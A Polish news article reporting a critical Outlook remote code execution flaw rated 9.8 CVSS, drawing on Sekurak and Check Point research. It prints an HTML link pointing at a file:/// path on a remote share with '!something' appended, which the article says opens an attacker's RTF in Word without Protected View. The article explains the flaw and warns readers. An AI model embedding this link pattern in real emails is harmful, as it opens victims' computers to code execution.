Krytyczna luka w Outlooku. Wystarczy jedno kliknięcie

Outlook posiada krytyczną lukę, która daje cyberprzestępcom duże możliwości działania. W skali CVSS krytyczność podatności oceniono na 9,8/10. Jest ona wykorzystywana w realnych atakach i może prowadzić do dużych kłopotów.

Blocking spam e-mail, warning pop-up for phishing mail, network security concept. Business woman working on laptop computer at home with warning window on screen
alert, asian, browsing, bug, business, businessman, casual, caution, computer, connection, contemporary, data, detected, e-mail, email, global, graphic, internet, junk mail, laptop, lifestyle, mail, media, mulware, network, networking, office, online, phishing, pop up, protect, protection, safety, scam, security, social, software, spam, technology, threat, typing, update, using, virus, warning, window, wireless, woman, word, workingOszustwo e-mail
Źródło zdjęć: © Adobe Stock | TippaPatt

Redakcja serwisu Sekurak poinformowała o krytycznej podatności w Outlooku. Aby paść ofiarą cyberprzestępców, wystarczy jedno kliknięcie w niewłaściwym miejscu. Odpowiednio spreparowana wiadomość może sprawić, że szybko odczujemy konsekwencje nierozważnego działania.

Krytyczność omawianej podatności RCE (Remote Code Execution) w Outlooku oceniono na 9,8/10 w skali CVSS. Na podstawie badania, które przeprowadziła firma Checpoint, dowiadujemy się, że umieszczenie w mailu linku o następującej postaci jest w pełni bezpieczne:

<a href= "file:///\\10.10.111.111\test\test.rtf">CLICK ME</a>,

Problem pojawia się natomiast wtedy, gdy ów link zostanie nieco zmodyfikowany. Kiedy w jego treści pojawi się wykrzyknik oraz losowe znaki, prowadzi to do otwarcia dokumentu MS Word (rtf). Tak skonstruowany link uruchomi Worda z wyłączonym Protected View.

<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

Dalsza część artykułu pod materiałem wideo

Krytyczna podatność w Outlooku

W praktyce haker musi tylko wysłać odpowiednio przygotowanego maila do ofiary. Gdy ta zdecyduje się na otwarcie go, w tle otworzy się plik tekstowy, dostarczony przez atakującego. W pliku tym zawarty jest osobny exploit, który pozwala na wykonanie kodu na komputerze ofiary.

Tego rodzaju podatność znacznie ułatwia działanie osobom przeprowadzającym ataki. Jako odbiorcy maili chętniej klikniemy w odnośnik niż zdecydujemy się na pobranie i uruchomienie załącznika z nieznanego źródła. Ponadto luka ta pozwala na ominięcie mechanizmu Protected View.

Co sądzisz o zmianach w cyfrowym świecie? Weź udział w badaniu WP.

Wybrane dla Ciebie
ZATRZYMAJ SIĘ NA CHWILĘ… TE ARTYKUŁY WARTO PRZECZYTAĆ